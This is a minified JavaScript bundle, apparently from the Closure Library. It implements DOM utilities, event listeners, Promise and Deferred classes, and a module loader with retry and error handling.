_.l.S=function(a,b,c){return _.jd(this.g,arguments)};_.l.createElement=function(a){return _.hd(this.g,a)};_.l.appendChild=function(a,b){a.appendChild(b)};_.l.append=_.kd;_.l.canHaveChildren=function(a){if(a.nodeType!=1)return!1;switch(a.tagName){case "APPLET":case "AREA":case "BASE":case "BR":case "COL":case "COMMAND":case "EMBED":case "FRAME":case "HR":case "IMG":case "INPUT":case "IFRAME":case "ISINDEX":case "KEYGEN":case "LINK":case "NOFRAMES":case "NOSCRIPT":case "META":case "OBJECT":case "PARAM":case "SCRIPT":case "SOURCE":case "STYLE":case "TRACK":case "WBR":return!1}return!0};
|
||||
_.l.Nf=_.ld;_.l.removeNode=_.md;_.l.contains=_.nd;_.l.Jc=_.od;var pd=function(){this.id="b"};pd.prototype.toString=function(){return this.id};_.qd=function(a,b){this.type=a instanceof pd?String(a):a;this.currentTarget=this.target=b;this.defaultPrevented=this.h=!1};_.qd.prototype.stopPropagation=function(){this.h=!0};_.qd.prototype.preventDefault=function(){this.defaultPrevented=!0};var rd=function(){if(!_.u.addEventListener||!Object.defineProperty)return!1;var a=!1,b=Object.defineProperty({},"passive",{get:function(){a=!0}});try{var c=function(){};_.u.addEventListener("test",c,b);_.u.removeEventListener("test",c,b)}catch(d){}return a}();_.sd=function(a,b){_.qd.call(this,a?a.type:"");this.relatedTarget=this.currentTarget=this.target=null;this.button=this.screenY=this.screenX=this.clientY=this.clientX=this.offsetY=this.offsetX=0;this.key="";this.charCode=this.keyCode=0;this.metaKey=this.shiftKey=this.altKey=this.ctrlKey=!1;this.state=null;this.j=!1;this.pointerId=0;this.pointerType="";this.timeStamp=0;this.g=null;a&&this.init(a,b)};_.E(_.sd,_.qd);
|
||||
_.sd.prototype.init=function(a,b){var c=this.type=a.type,d=a.changedTouches&&a.changedTouches.length?a.changedTouches[0]:null;this.target=a.target||a.srcElement;this.currentTarget=b;b=a.relatedTarget;b||(c=="mouseover"?b=a.fromElement:c=="mouseout"&&(b=a.toElement));this.relatedTarget=b;d?(this.clientX=d.clientX!==void 0?d.clientX:d.pageX,this.clientY=d.clientY!==void 0?d.clientY:d.pageY,this.screenX=d.screenX||0,this.screenY=d.screenY||0):(this.offsetX=_.Gc||a.offsetX!==void 0?a.offsetX:a.layerX,
|
||||
this.offsetY=_.Gc||a.offsetY!==void 0?a.offsetY:a.layerY,this.clientX=a.clientX!==void 0?a.clientX:a.pageX,this.clientY=a.clientY!==void 0?a.clientY:a.pageY,this.screenX=a.screenX||0,this.screenY=a.screenY||0);this.button=a.button;this.keyCode=a.keyCode||0;this.key=a.key||"";this.charCode=a.charCode||(c=="keypress"?a.keyCode:0);this.ctrlKey=a.ctrlKey;this.altKey=a.altKey;this.shiftKey=a.shiftKey;this.metaKey=a.metaKey;this.j=_.Ic?a.metaKey:a.ctrlKey;this.pointerId=a.pointerId||0;this.pointerType=
|
||||
a.pointerType;this.state=a.state;this.timeStamp=a.timeStamp;this.g=a;a.defaultPrevented&&_.sd.P.preventDefault.call(this)};_.sd.prototype.stopPropagation=function(){_.sd.P.stopPropagation.call(this);this.g.stopPropagation?this.g.stopPropagation():this.g.cancelBubble=!0};_.sd.prototype.preventDefault=function(){_.sd.P.preventDefault.call(this);var a=this.g;a.preventDefault?a.preventDefault():a.returnValue=!1};var td;td="closure_listenable_"+(Math.random()*1E6|0);_.ud=function(a){return!(!a||!a[td])};var vd=0;var wd=function(a,b,c,d,e){this.listener=a;this.proxy=null;this.src=b;this.type=c;this.capture=!!d;this.ce=e;this.key=++vd;this.kd=this.Kd=!1},xd=function(a){a.kd=!0;a.listener=null;a.proxy=null;a.src=null;a.ce=null};var zd;eb.prototype.add=function(a,b,c,d,e){var f=a.toString();a=this.g[f];a||(a=this.g[f]=[],this.h++);var g=yd(a,b,d,e);g>-1?(b=a[g],c||(b.Kd=!1)):(b=new wd(b,this.src,f,!!d,e),b.Kd=c,a.push(b));return b};eb.prototype.remove=function(a,b,c,d){a=a.toString();if(!(a in this.g))return!1;var e=this.g[a];b=yd(e,b,c,d);return b>-1?(xd(e[b]),Array.prototype.splice.call(e,b,1),e.length==0&&(delete this.g[a],this.h--),!0):!1};
|
||||
zd=function(a,b){var c=b.type;if(!(c in a.g))return!1;var d=_.wa(a.g[c],b);d&&(xd(b),a.g[c].length==0&&(delete a.g[c],a.h--));return d};_.Ad=function(a){var b=0,c;for(c in a.g){for(var d=a.g[c],e=0;e<d.length;e++)++b,xd(d[e]);delete a.g[c];a.h--}};eb.prototype.Zc=function(a,b,c,d){a=this.g[a.toString()];var e=-1;a&&(e=yd(a,b,c,d));return e>-1?a[e]:null};
|
||||
eb.prototype.hasListener=function(a,b){var c=a!==void 0,d=c?a.toString():"",e=b!==void 0;return Ca(this.g,function(f){for(var g=0;g<f.length;++g)if(!(c&&f[g].type!=d||e&&f[g].capture!=b))return!0;return!1})};var yd=function(a,b,c,d){for(var e=0;e<a.length;++e){var f=a[e];if(!f.kd&&f.listener==b&&f.capture==!!c&&f.ce==d)return e}return-1};var Bd,Cd,Dd,Gd,Id,Jd,Kd,Nd,Fd;Bd="closure_lm_"+(Math.random()*1E6|0);Cd={};Dd=0;_.F=function(a,b,c,d,e){if(d&&d.once)return _.Ed(a,b,c,d,e);if(Array.isArray(b)){for(var f=0;f<b.length;f++)_.F(a,b[f],c,d,e);return null}c=Fd(c);return _.ud(a)?a.L(b,c,_.za(d)?!!d.capture:!!d,e):Gd(a,b,c,!1,d,e)};
|
||||
Gd=function(a,b,c,d,e,f){if(!b)throw Error("w");var g=_.za(e)?!!e.capture:!!e,h=_.Hd(a);h||(a[Bd]=h=new eb(a));c=h.add(b,c,d,g,f);if(c.proxy)return c;d=Id();c.proxy=d;d.src=a;d.listener=c;if(a.addEventListener)rd||(e=g),e===void 0&&(e=!1),a.addEventListener(b.toString(),d,e);else if(a.attachEvent)a.attachEvent(Jd(b.toString()),d);else if(a.addListener&&a.removeListener)a.addListener(d);else throw Error("x");Dd++;return c};Id=function(){var a=Kd,b=function(c){return a.call(b.src,b.listener,c)};return b};
|
||||
_.Ed=function(a,b,c,d,e){if(Array.isArray(b)){for(var f=0;f<b.length;f++)_.Ed(a,b[f],c,d,e);return null}c=Fd(c);return _.ud(a)?a.Kb(b,c,_.za(d)?!!d.capture:!!d,e):Gd(a,b,c,!0,d,e)};_.Ld=function(a,b,c,d,e){if(Array.isArray(b))for(var f=0;f<b.length;f++)_.Ld(a,b[f],c,d,e);else d=_.za(d)?!!d.capture:!!d,c=Fd(c),_.ud(a)?a.fb(b,c,d,e):a&&(a=_.Hd(a))&&(b=a.Zc(b,c,d,e))&&_.Md(b)};
|
||||
_.Md=function(a){if(typeof a==="number"||!a||a.kd)return!1;var b=a.src;if(_.ud(b))return zd(b.Xa,a);var c=a.type,d=a.proxy;b.removeEventListener?b.removeEventListener(c,d,a.capture):b.detachEvent?b.detachEvent(Jd(c),d):b.addListener&&b.removeListener&&b.removeListener(d);Dd--;(c=_.Hd(b))?(zd(c,a),c.h==0&&(c.src=null,b[Bd]=null)):xd(a);return!0};Jd=function(a){return a in Cd?Cd[a]:Cd[a]="on"+a};
|
||||
Kd=function(a,b){if(a.kd)a=!0;else{b=new _.sd(b,this);var c=a.listener,d=a.ce||a.src;a.Kd&&_.Md(a);a=c.call(d,b)}return a};_.Hd=function(a){a=a[Bd];return a instanceof eb?a:null};Nd="__closure_events_fn_"+(Math.random()*1E9>>>0);Fd=function(a){if(typeof a==="function")return a;a[Nd]||(a[Nd]=function(b){return a.handleEvent(b)});return a[Nd]};_.G=function(){_.w.call(this);this.Xa=new eb(this);this.dj=this;this.ve=null};_.E(_.G,_.w);_.G.prototype[td]=!0;_.l=_.G.prototype;_.l.Ce=function(a){this.ve=a};_.l.addEventListener=function(a,b,c,d){_.F(this,a,b,c,d)};_.l.removeEventListener=function(a,b,c,d){_.Ld(this,a,b,c,d)};
|
||||
_.l.dispatchEvent=function(a){var b,c=this.ve;if(c)for(b=[];c;c=c.ve)b.push(c);c=this.dj;var d=a.type||a;if(typeof a==="string")a=new _.qd(a,c);else if(a instanceof _.qd)a.target=a.target||c;else{var e=a;a=new _.qd(d,c);Fa(a,e)}e=!0;var f;if(b)for(f=b.length-1;!a.h&&f>=0;f--){var g=a.currentTarget=b[f];e=Od(g,d,!0,a)&&e}a.h||(g=a.currentTarget=c,e=Od(g,d,!0,a)&&e,a.h||(e=Od(g,d,!1,a)&&e));if(b)for(f=0;!a.h&&f<b.length;f++)g=a.currentTarget=b[f],e=Od(g,d,!1,a)&&e;return e};
|
||||
_.l.K=function(){_.G.P.K.call(this);this.Xa&&_.Ad(this.Xa);this.ve=null};_.l.L=function(a,b,c,d){return this.Xa.add(String(a),b,!1,c,d)};_.l.Kb=function(a,b,c,d){return this.Xa.add(String(a),b,!0,c,d)};_.l.fb=function(a,b,c,d){return this.Xa.remove(String(a),b,c,d)};var Od=function(a,b,c,d){b=a.Xa.g[String(b)];if(!b)return!0;b=b.concat();for(var e=!0,f=0;f<b.length;++f){var g=b[f];if(g&&!g.kd&&g.capture==c){var h=g.listener,k=g.ce||g.src;g.Kd&&zd(a.Xa,g);e=h.call(k,d)!==!1&&e}}return e&&!d.defaultPrevented};
|
||||
_.G.prototype.Zc=function(a,b,c,d){return this.Xa.Zc(String(a),b,c,d)};_.G.prototype.hasListener=function(a,b){return this.Xa.hasListener(a!==void 0?String(a):void 0,b)};var gb=function(a){_.G.call(this);this.g=a||window;this.h=_.F(this.g,"resize",this.l,!1,this);this.j=_.gd(this.g||window)};_.E(gb,_.G);gb.prototype.K=function(){gb.P.K.call(this);this.h&&(_.Md(this.h),this.h=null);this.j=this.g=null};gb.prototype.l=function(){var a=_.gd(this.g||window);_.mc(a,this.j)||(this.j=a,this.dispatchEvent("resize"))};var ib=function(a){_.G.call(this);this.j=a?a.g.defaultView:window;this.o=this.j.devicePixelRatio>=1.5?2:1;this.h=(0,_.C)(this.A,this);this.l=null;(this.g=this.j.matchMedia?this.j.matchMedia("(min-resolution: 1.5dppx), (-webkit-min-device-pixel-ratio: 1.5)"):null)&&typeof this.g.addListener!=="function"&&typeof this.g.addEventListener!=="function"&&(this.g=null)};_.E(ib,_.G);
|
||||
ib.prototype.start=function(){var a=this;this.g&&(typeof this.g.addEventListener==="function"?(this.g.addEventListener("change",this.h),this.l=function(){a.g.removeEventListener("change",a.h)}):(this.g.addListener(this.h),this.l=function(){a.g.removeListener(a.h)}))};ib.prototype.A=function(){var a=this.j.devicePixelRatio>=1.5?2:1;this.o!=a&&(this.o=a,this.dispatchEvent("a"))};ib.prototype.K=function(){this.l&&this.l();ib.P.K.call(this)};_.E(jb,_.w);jb.prototype.K=function(){this.h=this.l=null;this.g&&(this.g.dispose(),this.g=null);_.qa(this.j);this.j=null};_.pa(_.ec,jb);var kb=new Uint8Array(123);var Pd=[];Ub=Ub||{};var Qd=function(){_.w.call(this)};_.E(Qd,_.w);Qd.prototype.initialize=function(){};var Rd=function(a,b){this.g=a;this.h=b};Rd.prototype.execute=function(a){this.g&&(this.g.call(this.h||null,a),this.g=this.h=null)};Rd.prototype.abort=function(){this.h=this.g=null};var Sd=function(a,b){_.w.call(this);this.h=a;this.A=b;this.o=[];this.l=[];this.j=[]};_.E(Sd,_.w);Sd.prototype.B=Qd;Sd.prototype.g=null;Sd.prototype.Ya=function(){return this.A};var Td=function(a,b){a.l.push(new Rd(b))};Sd.prototype.onLoad=function(a){var b=new this.B;b.initialize(a());this.g=b;b=(b=Ud(this.j,a()))||Ud(this.o,a());b||(this.l.length=0);return b};Sd.prototype.If=function(a){(a=Ud(this.l,a))&&_.nb(Error("z`"+a));this.j.length=0;this.o.length=0};
|
||||
var Ud=function(a,b){for(var c=[],d=0;d<a.length;d++)try{a[d].execute(b)}catch(e){_.nb(e),c.push(e)}a.length=0;return c.length?c:null};Sd.prototype.K=function(){Sd.P.K.call(this);_.qa(this.g)};var Vd=function(){this.C=this.R=null};_.l=Vd.prototype;_.l.Yh=function(){};_.l.Wf=function(){};_.l.Uh=function(){throw Error("B");};_.l.Tg=function(){return this.R};_.l.Xf=function(a){this.R=a};_.l.isActive=function(){return!1};_.l.th=function(){return!1};_.l.Sh=function(){};var Wd=typeof AsyncContext!=="undefined"&&typeof AsyncContext.Snapshot==="function"?function(a){return a&&AsyncContext.Snapshot.wrap(a)}:function(a){return a};var Xd=function(a,b){this.l=a;this.j=b;this.h=0;this.g=null};Xd.prototype.get=function(){if(this.h>0){this.h--;var a=this.g;this.g=a.next;a.next=null}else a=this.l();return a};var pb=function(a,b){a.j(b);a.h<100&&(a.h++,b.next=a.g,a.g=b)};var Yd=function(){this.h=this.g=null};Yd.prototype.add=function(a,b){var c=qb.get();c.set(a,b);this.h?this.h.next=c:this.g=c;this.h=c};Yd.prototype.remove=function(){var a=null;this.g&&(a=this.g,this.g=this.g.next,this.g||(this.h=null),a.next=null);return a};var qb=new Xd(function(){return new Zd},function(a){return a.reset()}),Zd=function(){this.next=this.scope=this.g=null};Zd.prototype.set=function(a,b){this.g=a;this.scope=b;this.next=null};
|
||||
Zd.prototype.reset=function(){this.next=this.scope=this.g=null};var $d,rb=!1,ob=new Yd,be=function(a,b){$d||ae();rb||($d(),rb=!0);ob.add(a,b)},ae=function(){var a=Promise.resolve(void 0);$d=function(){a.then(sb)}};_.ce=function(){};var de=function(a){if(!a)return!1;try{return!!a.$goog_Thenable}catch(b){return!1}};var ge,re,qe,oe,pe,te,se,ue;_.fe=function(a){this.g=0;this.B=void 0;this.l=this.h=this.j=null;this.o=this.A=!1;if(a!=_.ce)try{var b=this;a.call(void 0,function(c){_.ee(b,2,c)},function(c){_.ee(b,3,c)})}catch(c){_.ee(this,3,c)}};ge=function(){this.next=this.j=this.h=this.l=this.g=null;this.o=!1};ge.prototype.reset=function(){this.j=this.h=this.l=this.g=null;this.o=!1};var he=new Xd(function(){return new ge},function(a){a.reset()}),ie=function(a,b,c){var d=he.get();d.l=a;d.h=b;d.j=c;return d};
|
||||
_.fe.prototype.then=function(a,b,c){return je(this,Wd(typeof a==="function"?a:null),Wd(typeof b==="function"?b:null),c)};_.fe.prototype.$goog_Thenable=!0;var le=function(a,b,c,d){ke(a,ie(b||_.ce,c||null,d))};_.fe.prototype.finally=function(a){var b=this;a=Wd(a);return new Promise(function(c,d){le(b,function(e){a();c(e)},function(e){a();d(e)})})};_.fe.prototype.C=function(a,b){return je(this,null,Wd(a),b)};_.fe.prototype.catch=_.fe.prototype.C;
|
||||
_.fe.prototype.cancel=function(a){if(this.g==0){var b=new _.me(a);be(function(){ne(this,b)},this)}};
|
||||
var ne=function(a,b){if(a.g==0)if(a.j){var c=a.j;if(c.h){for(var d=0,e=null,f=null,g=c.h;g&&(g.o||(d++,g.g==a&&(e=g),!(e&&d>1)));g=g.next)e||(f=g);e&&(c.g==0&&d==1?ne(c,b):(f?(d=f,d.next==c.l&&(c.l=d),d.next=d.next.next):oe(c),pe(c,e,3,b)))}a.j=null}else _.ee(a,3,b)},ke=function(a,b){a.h||a.g!=2&&a.g!=3||qe(a);a.l?a.l.next=b:a.h=b;a.l=b},je=function(a,b,c,d){var e=ie(null,null,null);e.g=new _.fe(function(f,g){e.l=b?function(h){try{var k=b.call(d,h);f(k)}catch(m){g(m)}}:f;e.h=c?function(h){try{var k=
|
||||
c.call(d,h);k===void 0&&h instanceof _.me?g(h):f(k)}catch(m){g(m)}}:g});e.g.j=a;ke(a,e);return e.g};_.fe.prototype.G=function(a){this.g=0;_.ee(this,2,a)};_.fe.prototype.I=function(a){this.g=0;_.ee(this,3,a)};
|
||||
_.ee=function(a,b,c){if(a.g==0){a===c&&(b=3,c=new TypeError("C"));a.g=1;a:{var d=c,e=a.G,f=a.I;if(d instanceof _.fe){le(d,e,f,a);var g=!0}else if(de(d))d.then(e,f,a),g=!0;else{if(_.za(d))try{var h=d.then;if(typeof h==="function"){re(d,h,e,f,a);g=!0;break a}}catch(k){f.call(a,k);g=!0;break a}g=!1}}g||(a.B=c,a.g=b,a.j=null,qe(a),b!=3||c instanceof _.me||se(a,c))}};re=function(a,b,c,d,e){var f=!1,g=function(k){f||(f=!0,c.call(e,k))},h=function(k){f||(f=!0,d.call(e,k))};try{b.call(a,g,h)}catch(k){h(k)}};
|
||||
qe=function(a){a.A||(a.A=!0,be(a.F,a))};oe=function(a){var b=null;a.h&&(b=a.h,a.h=b.next,b.next=null);a.h||(a.l=null);return b};_.fe.prototype.F=function(){for(var a;a=oe(this);)pe(this,a,this.g,this.B);this.A=!1};pe=function(a,b,c,d){if(c==3&&b.h&&!b.o)for(;a&&a.o;a=a.j)a.o=!1;if(b.g)b.g.j=null,te(b,c,d);else try{b.o?b.l.call(b.j):te(b,c,d)}catch(e){ue.call(null,e)}pb(he,b)};te=function(a,b,c){b==2?a.l.call(a.j,c):a.h&&a.h.call(a.j,c)};se=function(a,b){a.o=!0;be(function(){a.o&&ue.call(null,b)})};
|
||||
ue=_.nb;_.me=function(a){_.aa.call(this,a)};_.E(_.me,_.aa);_.me.prototype.name="cancel";/*
|
||||
|
||||
Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.
|
||||
Copyright The Closure Library Authors.
|
||||
SPDX-License-Identifier: MIT
|
||||
*/
|
||||
var ve=function(){this.B=[];this.l=this.g=!1;this.j=void 0;this.G=this.M=this.F=!1;this.C=0;this.h=null;this.o=0};ve.prototype.cancel=function(a){if(this.g)this.j instanceof ve&&this.j.cancel();else{if(this.h){var b=this.h;delete this.h;a?b.cancel(a):(b.o--,b.o<=0&&b.cancel())}this.G=!0;this.g||this.A(new _.we(this))}};ve.prototype.I=function(a,b){this.F=!1;xe(this,a,b)};var xe=function(a,b,c){a.g=!0;a.j=c;a.l=!b;ye(a)},Ae=function(a){if(a.g){if(!a.G)throw new ze(a);a.G=!1}};
|
||||
ve.prototype.callback=function(a){Ae(this);xe(this,!0,a)};ve.prototype.A=function(a){Ae(this);xe(this,!1,a)};var Ce=function(a,b,c){Be(a,b,null,c)},De=function(a,b,c){Be(a,null,b,c)};ve.prototype.finally=function(a){var b=this;return Ee(new Promise(function(c,d){Be(b,function(e){a();c(e)},function(e){a();d(e)})}))};var Be=function(a,b,c,d){var e=a.g;e||(b===c?b=c=Wd(b):(b=Wd(b),c=Wd(c)));a.B.push([b,c,d]);e&&ye(a)};
|
||||
ve.prototype.then=function(a,b,c){var d,e,f=new _.fe(function(g,h){e=g;d=h});Be(this,e,function(g){g instanceof _.we?f.cancel():d(g);return Fe},this);return f.then(a,b,c)};ve.prototype.$goog_Thenable=!0;var Ge=function(a,b){b instanceof ve?Ce(a,(0,_.C)(b.J,b)):Ce(a,function(){return b})};ve.prototype.J=function(a){var b=new ve;Be(this,b.callback,b.A,b);a&&(b.h=this,this.o++);return b};
|
||||
var He=function(a){return _.kc(a.B,function(b){return typeof b[1]==="function"})},Fe={},ye=function(a){if(a.C&&a.g&&He(a)){var b=a.C,c=Ie[b];c&&(_.u.clearTimeout(c.g),delete Ie[b]);a.C=0}a.h&&(a.h.o--,delete a.h);b=a.j;for(var d=c=!1;a.B.length&&!a.F;){var e=a.B.shift(),f=e[0],g=e[1];e=e[2];if(f=a.l?g:f)try{var h=f.call(e||null,b);h===Fe&&(h=void 0);h!==void 0&&(a.l=a.l&&(h==b||h instanceof Error),a.j=b=h);if(de(b)||typeof _.u.Promise==="function"&&b instanceof _.u.Promise)d=!0,a.F=!0}catch(k){b=
|
||||
k,a.l=!0,He(a)||(c=!0)}}a.j=b;d&&(h=(0,_.C)(a.I,a,!0),d=(0,_.C)(a.I,a,!1),b instanceof ve?(Be(b,h,d),b.M=!0):b.then(h,d));c&&(b=new Je(b),Ie[b.g]=b,a.C=b.g)},Ee=function(a){var b=new ve;a.then(function(c){b.callback(c)},function(c){b.A(c)});return b},ze=function(){_.aa.call(this)};_.E(ze,_.aa);ze.prototype.message="Deferred has already fired";ze.prototype.name="AlreadyCalledError";_.we=function(){_.aa.call(this)};_.E(_.we,_.aa);_.we.prototype.message="Deferred was canceled";_.we.prototype.name="CanceledError";
|
||||
var Je=function(a){this.g=_.u.setTimeout((0,_.C)(this.throwError,this),0);this.h=a};Je.prototype.throwError=function(){delete Ie[this.g];throw this.h;};var Ie={};var Ke=function(a,b,c,d,e){c=Error.call(this);this.message=c.message;"stack"in c&&(this.stack=c.stack);this.name="ModuleLoadFailure";this.type=a;this.status=b;this.url=d;this.cause=e;this.message=this.toString()};_.y(Ke,Error);Ke.prototype.toString=function(){return Le(this)+" ("+(this.status!=void 0?this.status:"?")+")"};
|
||||
var Le=function(a){switch(a.type){case Ke.g.tg:return"Unauthorized";case Ke.g.hg:return"Consecutive load failures";case Ke.g.TIMEOUT:return"Timed out";case Ke.g.rg:return"Out of date module id";case Ke.g.Ie:return"Init error";default:return"Unknown failure type "+a.type}};Ub.Sa=Ke;Ub.Sa.g={tg:0,hg:1,TIMEOUT:2,rg:3,Ie:4};var Me=function(){Vd.call(this);this.M=null;this.g={};this.l=[];this.o=[];this.J=[];this.h=[];this.B=[];this.A={};this.pa={};this.j=this.F=new Sd([],"");this.N=null;this.I=new ve;this.O=!1;this.G=0;this.V=this.Z=this.T=!1};_.E(Me,Vd);var Ne=function(a,b){_.aa.call(this,"Error loading "+a+": "+b)};_.E(Ne,_.aa);Me.prototype.Yh=function(a){this.O=a};
|
||||
Me.prototype.Wf=function(a,b){if(!(this instanceof Me))this.Wf(a,b);else if(typeof a==="string"){if(a.startsWith("d$")){a=a.substring(2);for(var c=[],d=0,e=a.indexOf("/"),f=0,g=!1,h=0;;){var k=g?a.substring(f):a.substring(f,e);if(k.length===0)d++,f="sy"+d.toString(36),k=[];else{var m=k.indexOf(":");if(m<0)f=k,k=[];else if(m===k.length-1)f=k.substring(0,m),k=Array(c[h-1]);else{f=k.substring(0,m);k=k.substring(m+1).split(",");m=h;for(var n=0;n<k.length;n++)m-=k[n].length===0?1:Number(k[n]),k[n]=c[m]}m=
|
||||
0;if(f.length===0)m=1;else if(f.charAt(0)==="+"||f.charAt(0)==="-")m=Number(f);m!==0&&(d+=m,f="sy"+d.toString(36))}c.push(f);Oe(this,f,k);if(g)break;f=e+1;e=a.indexOf("/",f);e===-1&&(g=!0);h++}this.M=c}else if(a.startsWith("p$"))Pe(this,a);else{a=a.split("/");c=[];for(d=0;d<a.length;d++){h=a[d].split(":");e=h[0];g=[];if(h[1])for(g=h[1].split(","),h=0;h<g.length;h++)g[h]=c[parseInt(g[h],36)];c.push(e);Oe(this,e,g)}this.M=c}b&&b.length?(ya(this.l,b),this.N=b[b.length-1]):this.I.g||this.I.callback();
|
||||
Object.freeze(this.M);Qe(this)}};
|
||||
var Pe=function(a,b){var c=b.substring(2);for(b=0;b<64;b++)kb["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_".charCodeAt(b)]=b;var d={Dg:c,fc:0};mb(d);var e=mb(d),f=mb(d)+1;b=Array(e);var g=Array(e),h=Array(e);f=Array(f);var k=0,m=0,n=d.fc;d.fc=d.Dg.indexOf("|",d.fc)+1;for(var p=0;p<e;p++){var q=mb(d),r=q&2,t=q&1;q>>>=2;t?(k+=q>>>1^-(q&1),q="sy"+k.toString(36)):(t=n,n+=q,q=c.substring(t,n));b[p]=q;r&&(f[m++]=q)}f[m]="";d.fc++;m=e&-2;c=e&1;for(k=0;k<m;k+=2)n=lb(d),h[k]=n&7,h[k+1]=
|
||||
n>>>3&7;c&&(c=lb(d),h[m]=c&7);d.fc++;for(m=0;m<e;m++)h[m]===7&&(h[m]=mb(d));d.fc++;for(c=m=0;c<e;c++){k=h[c];n=k===0?Pd:Array(k);g[c]=n;p=m;for(r=0;r<k;r++)p-=mb(d),n[r]=f[p];f[m]===b[c]&&m++}for(d=0;d<b.length;d++)Oe(a,b[d],g[d]);a.M=b};Me.prototype.Uh=function(a,b){if(this.A[a]){delete this.A[a][b];for(var c in this.A[a])return;delete this.A[a]}};Me.prototype.Xf=function(a){Me.P.Xf.call(this,a);Qe(this)};Me.prototype.isActive=function(){return this.l.length>0};
|
||||
Me.prototype.th=function(){return this.B.length>0};
|
||||
var Se=function(a){var b=a.T,c=a.isActive();c!=b&&(Re(a,c?"active":"idle"),a.T=c);b=a.th();b!=a.Z&&(Re(a,b?"userActive":"userIdle"),a.Z=b)},Oe=function(a,b,c){a.g[b]?(a=a.g[b].h,a!=c&&a.splice.apply(a,[0,a.length].concat(_.Jb(c)))):a.g[b]=new Sd(c,b)},Ve=function(a,b,c){var d=[];Ba(b,d);b=[];for(var e={},f=0;f<d.length;f++){var g=d[f],h=a.g[g];if(!h)throw Error("D`"+g);var k=new ve;e[g]=k;h.g?k.callback(a.R):(Te(a,g,h,!!c,k),Ue(a,g)||b.push(g))}b.length>0&&(a.l.length===0?a.Da(b):(a.h.push(b),Se(a)));
|
||||
return e},Te=function(a,b,c,d,e){c.o.push(new Rd(e.callback,e));Td(c,function(f){e.A(new Ne(b,f))});Ue(a,b)?d&&(_.ua(a.B,b)||a.B.push(b),Se(a)):d&&(_.ua(a.B,b)||a.B.push(b))};
|
||||
Me.prototype.Da=function(a,b,c){var d=this;b||(this.G=0);var e=We(this,a);this.l=e;this.o=this.O?a:_.xa(e);Se(this);if(e.length!==0){this.J.push.apply(this.J,e);if(Object.keys(this.A).length>0&&!this.C.J)throw Error("E");a=(0,_.C)(this.C.I,this.C,_.xa(e),this.g,{qj:this.A,tj:!!c,If:function(f,g){var h=d.o;f=f!=null?f:void 0;d.G++;var k=_.xa(e);d.o=h;e.forEach(_.$b(_.wa,d.J),d);f==401?(Xe(d,new Ub.Sa(Ub.Sa.g.tg,f)),d.h.length=0):f==410?(Ye(d,new Ub.Sa(Ub.Sa.g.rg,f)),Ze(d)):d.G>=3?(Ye(d,new Ub.Sa(Ub.Sa.g.hg,
|
||||
f,k,g)),Ze(d)):d.Da(d.o,!0,f==8001||!1)},Wk:(0,_.C)(this.ja,this)});(b=Math.pow(this.G,2)*5E3)?_.u.setTimeout(a,b):a()}};
|
||||
var We=function(a,b){b=b.filter(function(e){return a.g[e].g?(_.u.setTimeout(function(){return Error("F`"+e)},0),!1):!0});for(var c=[],d=0;d<b.length;d++)c=c.concat($e(a,b[d]));Ba(c);return!a.O&&c.length>1?(b=c.shift(),a.h=c.map(function(e){return[e]}).concat(a.h),[b]):c},$e=function(a,b){var c=Ga(a.J),d=[];c[b]||d.push(b);b=[b];for(var e=0;e<b.length;e++)for(var f=a.g[b[e]].h,g=f.length-1;g>=0;g--){var h=f[g];a.g[h].g||c[h]||(d.push(h),b.push(h))}d.reverse();Ba(d);return d},Qe=function(a){if(a.j==
|
||||
a.F){a.j=null;var b=a.F.onLoad((0,_.C)(a.Tg,a));b&&b.length&&Xe(a,new Ub.Sa(Ub.Sa.g.Ie,void 0,void 0,void 0,b[0]));Se(a)}},ma=function(a){if(a.j){var b=a.j.Ya(),c=[];if(a.A[b]){for(var d=_.z(Object.keys(a.A[b])),e=d.next();!e.done;e=d.next()){e=e.value;var f=a.g[e];f&&!f.g&&(a.Uh(b,e),c.push(e))}Ve(a,c)}a.eb()||((c=a.g[b].onLoad((0,_.C)(a.Tg,a)))&&c.length&&Xe(a,new Ub.Sa(Ub.Sa.g.Ie,void 0,void 0,void 0,c[0])),_.wa(a.B,b),_.wa(a.l,b),a.l.length===0&&Ze(a),a.N&&b==a.N&&(a.I.g||a.I.callback()),Se(a),
|
||||
a.j=null)}},Ue=function(a,b){if(_.ua(a.l,b))return!0;for(var c=0;c<a.h.length;c++)if(_.ua(a.h[c],b))return!0;return!1};Me.prototype.load=function(a,b){return Ve(this,[a],b)[a]};var ka=function(a){var b=_.ca;b.j&&b.j.Ya()==="synthetic_module_overhead"&&(ma(b),delete b.g.synthetic_module_overhead);b.g[a]&&af(b,b.g[a].h||[],function(c){c.g=new Qd;_.wa(b.l,c.Ya())},function(c){return!c.g});b.j=b.g[a]};
|
||||
Me.prototype.Sh=function(a){this.j||(this.g.synthetic_module_overhead=new Sd([],"synthetic_module_overhead"),this.j=this.g.synthetic_module_overhead);this.j.j.push(new Rd(a))};Me.prototype.ja=function(){Ye(this,new Ub.Sa(Ub.Sa.g.TIMEOUT));Ze(this)};
|
||||
var Ye=function(a,b){a.o.length>1?a.h=a.o.map(function(c){return[c]}).concat(a.h):Xe(a,b)},Xe=function(a,b){var c=a.o;a.l.length=0;for(var d=[],e=0;e<a.h.length;e++){var f=a.h[e].filter(function(k){var m=$e(this,k);return _.kc(c,function(n){return _.ua(m,n)})},a);ya(d,f)}for(e=0;e<c.length;e++)_.va(d,c[e]);for(e=0;e<d.length;e++){for(f=0;f<a.h.length;f++)_.wa(a.h[f],d[e]);_.wa(a.B,d[e])}if(e=a.pa.error)for(f=0;f<e.length;f++)for(var g=e[f],h=0;h<d.length;h++)g("error",d[h],b);for(d=0;d<c.length;d++)a.g[c[d]]&&
|
||||
a.g[c[d]].If(b);a.o.length=0;Se(a)},Ze=function(a){for(;a.h.length;){var b=a.h.shift().filter(function(c){return!this.g[c].g},a);if(b.length>0){a.Da(b);return}}Se(a)},Re=function(a,b){a=a.pa[b];for(var c=0;a&&c<a.length;c++)a[c](b)},af=function(a,b,c,d,e){d=d===void 0?function(){return!0}:d;e=e===void 0?{}:e;b=_.z(b);for(var f=b.next();!f.done;f=b.next()){f=f.value;var g=a.g[f];!e[f]&&d(g)&&(e[f]=!0,af(a,g.h||[],c,d,e),c(g))}};
|
||||
